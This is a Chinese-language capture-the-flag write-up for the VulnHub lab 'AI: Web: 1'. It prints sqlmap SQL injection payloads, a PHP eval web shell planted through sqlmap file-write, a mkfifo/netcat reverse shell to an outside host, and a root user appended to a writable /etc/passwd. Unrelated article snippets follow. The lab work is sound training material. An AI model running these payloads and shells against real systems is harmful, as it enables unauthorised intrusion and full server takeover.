南通免费网站建设/合肥关键词快速排名

南通免费网站建设,合肥关键词快速排名,商城网站开发用什么框架,广西玉林建设厅官方网站靶机下载官网AI: Web: 1 ~ VulnHub 靶机描述 Difficulty: IntermediateNetwork: DHCP (Automatically assign)Network Mode: NATThis box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low…

靶机下载官网AI: Web: 1 ~ VulnHub

靶机描述

Difficulty: IntermediateNetwork: DHCP (Automatically assign)Network Mode: NATThis box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root. For any hint please tweet on @arif_xpress

难度:中级
网络:DHCP(自动分配)
网络模式:NAT

这个盒子旨在测试渗透测试人员的技能。目标很简单。从/root/flag.txt中获取标志(flag)。对盒子进行枚举,获取低权限的shell,然后将权限提升到root。如需任何提示,请在推特上关注@arif_xpress。

靶机界面

信息收集

主机发现

┌──(kali💋kali)-[~]
└─$ sudo nmap -sP 10.4.7.0/24 -oN nmap.sP      
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-12 11:51 CST
Nmap scan report for 10.4.7.2
Host is up (0.00024s latency).
MAC Address: 00:50:56:E0:20:34 (VMware)
Nmap scan report for 10.4.7.179
Host is up (0.00064s latency).
MAC Address: 00:0C:29:42:F7:5E (VMware)
Nmap scan report for 10.4.7.254
Host is up (0.0015s latency).
MAC Address: 00:50:56:E4:E4:95 (VMware)
Nmap scan report for 10.4.7.139
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.98 seconds

端口扫描

┌──(kali💋kali)-[~]
└─$ sudo nmap -A -T4 -sC -p- -sT 10.4.7.179 -oN nmap.A                                                  
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-12 11:55 CST
Nmap scan report for 10.4.7.179
Host is up (0.00052s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
|_http-title: AI Web 1.0
| http-robots.txt: 2 disallowed entries
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
MAC Address: 00:0C:29:42:F7:5E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.4.7.179

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds

网站信息

网站首页

nikto 报告

┌──(kali💋kali)-[~]
└─$ nikto -h http://10.4.7.179/                                                                          130 ⨯
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.4.7.179
+ Target Hostname:    10.4.7.179
+ Target Port:        80
+ Start Time:         2025-02-12 12:35:32 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 8d, size: 590703a18e440, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8104 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2025-02-12 12:39:25 (GMT8) (233 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt

Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/

/se3reTdir777/目录

 敏感目录扫描

/m3diNf0/目录扫描

dirb扫描器

┌──(kali💋kali)-[~]
└─$ dirb http://10.4.7.179/m3diNf0/                                                                        1 ⨯

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Feb 12 12:47:36 2025
URL_BASE: http://10.4.7.179/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.4.7.179/m3diNf0/ ----
+ http://10.4.7.179/m3diNf0/info.php (CODE:200|SIZE:84260)                                                    
                                                                                                              
-----------------
END_TIME: Wed Feb 12 12:47:40 2025
DOWNLOADED: 4612 - FOUND: 1

dirsearch扫描器

扫出了/info.php

提取敏感信息

User/Group      www-data(33)/33 
DOCUMENT_ROOT   /home/www/html/web1x443290o2sdf92213

 se3reTdir777 目录扫描

┌──(kali💋kali)-[~]
└─$ dirb http://10.4.7.179/se3reTdir777/                          

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Feb 12 16:17:39 2025
URL_BASE: http://10.4.7.179/se3reTdir777/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.4.7.179/se3reTdir777/ ----
+ http://10.4.7.179/se3reTdir777/index.php (CODE:200|SIZE:1228)                                               
==> DIRECTORY: http://10.4.7.179/se3reTdir777/uploads/                                                        
                                                                                                              
---- Entering directory: http://10.4.7.179/se3reTdir777/uploads/ ----
                                                                                                              
-----------------
END_TIME: Wed Feb 12 16:17:46 2025
DOWNLOADED: 9224 - FOUND: 1

找到切入点

找到提交参数,使用sqlmap找到漏洞

sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit"

注入点信息

  • 参数uid(POST 请求方式)
  • 总请求数:3940 个 HTTP (s) 请求

不同类型的注入分析

1. 布尔盲注(boolean - based blind)
  • 类型描述:基于布尔条件的盲注,通常利用 SQL 语句中的布尔表达式判断条件真假来获取信息,一般在 WHERE 或 HAVING 子句中使用。
  • 标题OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
  • Payloaduid=1' OR NOT 1507=1507#&Operation=Submit
    • 原理:在原始 SQL 语句中,1' 用于闭合可能存在的单引号,OR NOT 1507=1507 是一个恒为真的布尔表达式,# 是 MySQL 中的注释符,用于注释掉原 SQL 语句中剩余部分,避免语法错误。通过观察页面响应的不同(如页面返回状态、内容长度等)来判断条件真假,逐步获取数据库信息。
2. 错误回显注入(error - based)
  • 类型描述:利用数据库在执行错误 SQL 语句时返回的错误信息来获取数据库相关信息,通常在 WHERE、HAVING、ORDER BY 或 GROUP BY 子句中使用。
  • 标题MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
  • Payloaduid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit
    • 原理1' 用于闭合单引号,AND 连接后续条件,GTID_SUBSET 是 MySQL 5.6 及以上版本的一个函数,CONCAT 用于拼接字符串,ELT 函数根据条件判断返回结果。当执行该 SQL 语句时,如果数据库版本支持且语法错误,会返回包含我们构造信息的错误信息,从而获取数据库信息。-- IvZq 是注释部分,用于注释掉原 SQL 语句剩余部分。
3. 时间盲注(time - based blind)
  • 类型描述:基于时间延迟的盲注,通过让数据库执行 SLEEP 函数来判断条件真假。如果条件为真,数据库会暂停执行一段时间,根据页面响应时间的变化来获取信息。
  • 标题MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  • Payloaduid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit
    • 原理1' 闭合单引号,AND 连接条件,SELECT(SLEEP(5)) 会让数据库暂停 5 秒。如果页面响应时间明显增加,说明条件为真,反之则为假。通过多次尝试不同条件,逐步获取数据库信息。-- vIYW 是注释部分。
4. UNION 查询注入(UNION query)
  • 类型描述:利用 SQL 的 UNION 操作符将原查询结果和我们构造的查询结果合并,从而获取数据库信息。
  • 标题MySQL UNION query (NULL) - 3 columns
  • Payloaduid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
    • 原理1' 闭合单引号,UNION ALL 用于合并查询结果,SELECT NULL,NULL,CONCAT(...) 是我们构造的查询语句,需要保证列数与原查询结果一致(这里是 3 列)。CONCAT 函数用于拼接字符串,我们可以通过修改拼接内容来获取不同的数据库信息。# 是注释符,用于注释掉原 SQL 语句剩余部分

SQLI漏洞利用

sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --current-db

┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --current-db
        ___
       __H__                                                                                                   
 ___ ___[.]_____ ___ ___  {1.7.2#stable}                                                                       
|_ -| . [)]     | .'| . |                                                                                      
|___|_  ["]_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:54:10 /2025-02-12/

[17:54:10] [INFO] resuming back-end DBMS 'mysql'
[17:54:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:54:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:54:10] [INFO] fetching current database
current database: 'aiweb1'
[17:54:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[17:54:10] [WARNING] your sqlmap version is outdated

[*] ending @ 17:54:10 /2025-02-12/

 获取到库名aiweb1

sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --tables

┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --tables
        ___
       __H__                                                                                                   
 ___ ___[(]_____ ___ ___  {1.7.2#stable}                                                                       
|_ -| . [)]     | .'| . |                                                                                      
|___|_  ["]_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:57:21 /2025-02-12/

[17:57:21] [INFO] resuming back-end DBMS 'mysql'
[17:57:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:57:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:57:21] [INFO] fetching tables for database: 'aiweb1'
Database: aiweb1
[2 tables]
+------------+
| user       |
| systemUser |
+------------+

[17:57:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[17:57:21] [WARNING] your sqlmap version is outdated

[*] ending @ 17:57:21 /2025-02-12/

sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --dump 

┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --dump          
        ___
       __H__                                                                                                   
 ___ ___[(]_____ ___ ___  {1.7.2#stable}                                                                       
|_ -| . ["]     | .'| . |                                                                                      
|___|_  ["]_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:59:20 /2025-02-12/

[17:59:20] [INFO] resuming back-end DBMS 'mysql'
[17:59:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:59:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:59:21] [INFO] fetching tables for database: 'aiweb1'
[17:59:21] [INFO] fetching columns for table 'user' in database 'aiweb1'
[17:59:21] [INFO] fetching entries for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+----+----------+-----------+
| id | lastName | firstName |
+----+----------+-----------+
| 1  | admin    | admin     |
| 2  | root     | root      |
| 3  | mysql    | mysql     |
+----+----------+-----------+

拿到数据,数据为账号密码

使用sqlmap写入木马

撰写木马

┌──(kali💋kali)-[~]
└─$ vim yjh.php                                                                                     
                                                                                                               
┌──(kali💋kali)-[~]
└─$ cat yjh.php             
<?php
@eval($_REQUEST[777]);
?>

结合上面的DOCUMENT_ROOT   /home/www/html/web1x443290o2sdf92213 

sqlmap -u "http://10.4.7.179/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./yjh.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php

┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --file-write ./yjh.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php
[sudo] password for kali:
        ___
       __H__                                                                                                   
 ___ ___[.]_____ ___ ___  {1.7.2#stable}                                                                       
|_ -| . [,]     | .'| . |                                                                                      
|___|_  [.]_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:31:34 /2025-02-13/

[09:31:34] [INFO] resuming back-end DBMS 'mysql'
[09:31:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[09:31:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[09:31:34] [INFO] fingerprinting the back-end DBMS operating system
[09:31:34] [INFO] the back-end DBMS operating system is Linux
[09:31:34] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file 'yjh.php' has been successfully written on the back-end DBMS file system ('/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php')? [Y/n] y
[09:31:44] [INFO] the remote file '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php' is larger (35 B) than the local file 'yjh.php' (33B)
[09:31:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[09:31:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:31:44 /2025-02-13/

中国蚁剑连接

密码777

获取目录并拿到shell

反弹shell

本地监听

┌──(kali kali)-[~/Documents/AI_WEB_1]
└─$ nc -lnvp 1234              
listening on [any] 1234 ...

服务器上执行

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.9 1234 >/tmp/f

进入交互式Shell

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$

查看目前身份权限

提权

全局寻找可写文件夹、文件
find / -writable -type d 2>/dev/null #文件夹
find / -writable -type f 2>/dev/null #文件

我们可以发现/etc/passwd文件有普通用户写权限

ls -la /etc/passwd

利用/etc/passwd提权 

 www-data@aiweb1:/etc$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
....
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh

对root:x:0:0:root:/root:/bin/bash进行分析

root表示用户名;x表示密码hash,0表示用户ID,0表示用户组ID,/root表示用户相关信息,/bin/bash表示该用户使用何种shell执行命令

生成一个用户密码

向 /etc/passwd中写入一个用户

echo ajest:ajrFVgiA9Y9gw:0:0:root:/root:/bin/bash >> /etc/passwd
su ajest #切换用户

拿到 flag

┌──(kali💋kali)-[/dev]
└─$ nc -lnvp 1234                                            1 ⨯
listening on [any] 1234 ...
connect to [10.4.7.139] from (UNKNOWN) [10.4.7.179] 41696
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/$ su ajest
su ajest
Password: 123456

root@aiweb1:/# cat /root/flag.txt
cat /root/flag.txt
####################################################
#                                                  #
#                AI: WEB 1.0                       #
#                                                  #
#              Congratulation!!!                   #
#                                                  #
#      Thank you for penetrate my system.          #
#                                                  #
#            Hope you enjoyed this.                #
#                                                  #
#                                                  #
#  flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}  #
#                                                  #
####################################################
root@aiweb1:/# ^C

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/69950.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【limit 1000000,10 加载很慢该怎么优化?】

在 SQL 数据库中,使用 LIMIT 子句进行分页查询时,如果偏移量(offset)很大,查询性能可能会变得非常差。 这是因为数据库需要扫描和跳过大量的记录才能到达所需的起始位置,然后再取出所需的记录数。 例如,LIMIT 1000000, 10 表示跳过前 100 万条记录,然后取接下来的 10…

zookeeper的zkCli.sh登录server报错【无法正常使用】

如果zookeeper使用zkCli.sh登录的时候老是频闪&#xff0c;没有办法正常使用&#xff0c;大概率是与java的版本不兼容 [zookeeperPostgreSQL bin]$ ./zkCli.sh Connecting to localhost:2181 2025-02-05 19:23:53,933 [myid:] - INFO [main:Environment100] - Client envir…

初始JavaEE篇 —— Spring Web MVC入门(下)

找往期文章包括但不限于本期文章中不懂的知识点&#xff1a; 个人主页&#xff1a;我要学编程程(ಥ_ಥ)-CSDN博客 所属专栏&#xff1a;JavaEE 初始JavaEE篇 —— Spring Web MVC入门&#xff08;上&#xff09; 在上篇文章中&#xff0c;我们学习了一些注解的使用、Postman模…

Linux:线程的互斥与同步

一、买票的线程安全 大部分情况&#xff0c;线程使用的数据都是局部变量&#xff0c;变量的地址空间在线程栈空间内&#xff0c;这种情况&#xff0c;变量归属单个线程&#xff0c;其他线程无法获得这种变量。 但有时候&#xff0c;很多变量都需要在线程间共享&#xff0c;这样…

ESP学习-1(MicroPython VSCode开发环境搭建)

下载ESP8266固件&#xff1a;https://micropython.org/download/ESP8266_GENERIC/win电脑&#xff1a;pip install esptools python.exe -m pip install --upgrade pip esptooo.py --port COM5 erase_flash //清除之前的固件 esptool --port COM5 --baud 115200 write_fla…

Agents Go Deep 智能体深入探索

Agents Go Deep 智能体深入探索 核心事件 OpenAI发布了一款先进的智能体“深度研究”&#xff0c;它能借助网络搜索和推理生成研究报告。 最新进展 功能特性&#xff1a;该智能体依据数百个在线资源生成详细报告&#xff0c;目前仅支持文本输出&#xff0c;不过很快会增加对图…

【ubuntu24.04】 强制重启导致大模型的磁盘挂载出错

挂载NTFS文件系统出错 各种模型放在了这个机械硬盘上&#xff0c;虽然速度慢&#xff0c;但是好在容量大。大模型在工作&#xff0c;但是程序看起来有问题&#xff0c;导致系统卡死了&#xff0c;然后我重启了&#xff0c;然后报错&#xff1a;wrong fs type bad option &…

1.14学习总结

日常刷题单 刷了题目后&#xff0c;对于排序方法更加熟练&#xff0c;手搓代码的速度也得到了提高。 感觉字符串还不熟练&#xff0c;高精度更是云里雾里&#xff0c;上升空间极大。 同时看见今晚有个入门难度的测试&#xff0c;去练了练手&#xff0c;想看看自己是什么成分&…

vscode环境搭建

目录 一、安装VSCode 二、安装Python 三、安装Anaconda&#xff08;可选&#xff0c;但推荐&#xff09; 四、安装深度学习相关库 五、配置VSCode 六、 结果可视化 一、安装VSCode 访问官网下载&#xff1a;从VSCode官方网站下载适合你操作系统的安装包。安装&#xff1a;运行安…

自定义解的使用,反射,代理模式

文章目录 自定义注解反射代理模式、静态代理动态代理 自定义注解 springboot 框架中定义了大量的注解&#xff0c;为什么加上注解之后就能实现配置了。比如Autowired, 将 IOC 中的对象拿出来使用。 创建自定义的注解 Target(ElementType.METHOD) //作用的目标 Retention(Re…

【深度强化学习】策略梯度算法:REINFORCE

策略梯度 强化学习算法进阶 Q-learning、DQN 及 DQN 改进算法都是基于价值&#xff08;value-based&#xff09;的方法&#xff0c;其中 Q-learning 是处理有限状态的算法&#xff0c;而 DQN 可以用来解决连续状态的问题。在强化学习中&#xff0c;除了基于值函数的方法&#…

冒泡排序的缺陷及优化

冒泡排序的缺陷及优化 定义&#xff1a; 冒泡排序&#xff08;Bubble Sort&#xff09;是一种简单且常用的排序算法。其基本思想是通过多次遍历待排序的序列&#xff0c;依次比较相邻的两个元素&#xff0c;并根据需要交换它们的位置&#xff0c;使得较大的元素逐渐向后移动&a…

FPGA实现UltraScale GTH光口视频转USB3.0传输,基于FT601+Aurora 8b/10b编解码架构,提供2套工程源码和技术支持

目录 1、前言工程概述免责声明 2、相关方案推荐我已有的所有工程源码总目录----方便你快速找到自己喜欢的项目我这里已有的 GT 高速接口解决方案本博已有的FPGA驱动USB通信方案 3、工程详细设计方案工程设计原理框图输入Sensor之-->OV5640摄像头动态彩条输入视频之-->ADV…

Flutter使用gen_l10n实现多语言支持

实现步骤 在你的 Flutter 项目的 pubspec.yaml 文件中&#xff0c;确保添加了 flutter_localizations 和 intl 依赖。 flutter_localizations:sdk: flutterintl: ^0.18.0在 pubspec.yaml 中&#xff0c;添加 flutter 部分的 generate 配置。 generate: true在项目工程根目录新…

Spring IoC的实现机制是什么?

大家好&#xff0c;我是锋哥。今天分享关于【Spring IoC的实现机制是什么&#xff1f;】面试题。希望对大家有帮助&#xff1b; Spring IoC的实现机制是什么&#xff1f; 1000道 互联网大厂Java工程师 精选面试题-Java资源分享网 Spring IoC&#xff08;Inversion of Control…

2025最新深度学习pytorch完整配置:conda/jupyter/vscode

从今天开始&#xff0c;开始一个新的专栏&#xff0c;更新深度学习相关的内容&#xff0c;从入门到精通&#xff0c;首先的首先是关于环境的配置指南&#xff1a;工欲善其事必先利其器&#xff01; PyTorch 是由 Facebook&#xff08;现 Meta&#xff09;开发的 开源深度学习框…

达梦tpcc压测

造数 在这个日志输出中&#xff0c;主要执行了一系列数据库操作&#xff0c;涵盖了数据库信息检查、表的创建与数据加载、索引的添加、数据验证等步骤。具体分析如下&#xff1a; 数据库信息检查&#xff1a; 查询了数据库的版本、实例名称、日志文件大小、字符集等信息。 删…

通达信如何导出以往的分时数据

1当天分时数据的导出 以梦网科技为例&#xff0c;在分笔交易上面右键&#xff0c;选择“放大”&#xff0c;放大后选择“选项”&#xff0c;选择“数据导出”&#xff0c;弹出界面中修改路径与文件名即可。 2以往数据的导出 以梦网科技为例&#xff0c;今天是2025年2月14号…

1.攻防世界 unserialize3(wakeup()魔术方法、反序列化工作原理)

进入题目页面如下 直接开审 <?php // 定义一个名为 xctf 的类 class xctf {// 声明一个公共属性 $flag&#xff0c;初始值为字符串 111public $flag 111;// 定义一个魔术方法 __wakeup()// 当对象被反序列化时&#xff0c;__wakeup() 方法会自动调用public function __wa…

Excel 合并列数据

场景 要求每行数据的每个字段的内容不能以 [2,3,33,22] 形式展示 要求独立成列形式如下 代码 maven 依赖 <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactId><version>3.17</version></dependency>…